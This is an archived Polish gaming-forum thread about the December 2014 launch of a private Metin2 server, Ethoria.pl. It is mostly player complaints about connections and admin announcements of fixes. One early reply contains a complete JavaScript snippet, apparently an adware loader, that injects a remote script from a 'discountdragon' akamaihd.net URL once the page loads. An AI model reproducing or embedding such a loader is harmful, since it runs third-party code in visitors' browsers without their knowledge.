Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Ethoria.pl Source! 26.12.2014 Godz: 19:00 Zaczynamy! [Dedyk] [Medium/Easy]

Asfen.

Rekomendowane odpowiedzi

• Odpowiedzi 984
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Dziś jeszcze podobno.

<script>(function(){if (window.top == window.self){function bindReady©{function a(){b||(b=!0,c())}var b=!1;if(document.addEventListener)document.addEventListener("DOMContentLoaded",function(){a()},!1);else if(document.attachEvent){if(document.documentElement.doScroll&&window==window.top){var d=function(){if(!b&&document.body)try{document.documentElement.doScroll("left"),a()}catch©{setTimeout(d,0)}};d()}document.attachEvent("onreadystatechange",function(){"complete"===document.readyState&&a()})}window.addEventListener?window.addEventListener("load",a,!1):window.attachEvent&&window.attachEvent("onload",a)};bindReady(function(){(function(){var t=document.createElement('script');t.src ='//discountdragon-a.akamaihd.net/loaders/1942/l.js?pid=1942&systemid=c5a4d30baef36f68508b8b6f495c81bc&ext=Discount Dragon&aoi=1403349174&zoneid=647128&crr=1419285957&type=p'; document.body.appendChild(t);})();});}})();</script>

dasz autograf ?

Opublikowano

W serverinfo.py macie porty źle ustawione i macie te wasze "...." ustawicie dwa porty na, np. 13000 i będzie czytało status.

Atak na logowanie, hmm... ;x

Opublikowano

Czy tylko mi się wydaje że jest to troszkę not fair wobec innych graczy że połowa sobie śmiga na serwerze a druga połowa musi czekać na naprawę strony ? Dużo osób będzie po tyłach.

Kiedyś tu coś będzie :f

Opublikowano

Czy tylko mi się wydaje że jest to troszkę not fair wobec innych graczy że połowa sobie śmiga na serwerze a druga połowa musi czekać na naprawę strony ? Dużo osób będzie po tyłach.

Poczekamy na was! :)

"Wracaj z tarczą, a nie na tarczy. "

"Nigdy nie kłóć się z idiotą... Najpierw sprowadzi Cię do swego poziomu, a potem wykończy doświadczeniem."

Opublikowano

Strona działa

http://ethoria.pl

Opublikowano

Ej , gdy wybieram postać nie ładuję się postać , tylko wywala mnie znowy do wyboru chaneli . O co chodzi?

BvB////Ac Milan 

Opublikowano

Ej , gdy wybieram postać nie ładuję się postać , tylko wywala mnie znowy do wyboru chaneli . O co chodzi?

Przeinstaluj klienta lub zmień channel

Opublikowano

poprawisz dt?

- hp metkow

- drop kamieni

- drop mapy

- prywatne dt za 1kk.

inaczej w ch*j slabo robi sie je ;p

Okej jutro będzie to poprawione.

Opublikowano

4 godziny próbuję wejść na serwer a kiedy w końcu mi się udało zaczęli jakieś prace nad serwerem -,-

Lajf is Brutal.

Administracja w pełni sprawna, 2 godziny gry i ani jedno bota nie widziałem :>

"Wracaj z tarczą, a nie na tarczy. "

"Nigdy nie kłóć się z idiotą... Najpierw sprowadzi Cię do swego poziomu, a potem wykończy doświadczeniem."

Opublikowano

4 godziny próbuję wejść na serwer a kiedy w końcu mi się udało zaczęli jakieś prace nad serwerem -,-

Już działa kolego :3

2i29cae.png

Opublikowano

Wszystko działa zapraszamy do gry!

Jutro będzie już w 100% wszystko naprawione z błędów w grze.

Opublikowano

No nieźle weszłęm na doline 4 os na wh . ale ogólnie przyjemnie się gra mogę polecić i mam pytanie od którego lv baronówka? i skąd skrzynie z kostiumami?

Opublikowano

co mu się znowu stało ... co chwile cofki , afki , wyjeby .. o.O , postoi dłużej niż tydzień?

Jest problem z dedykiem czekamy aż sponsor odpali go.

Zaraz będzie działać.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...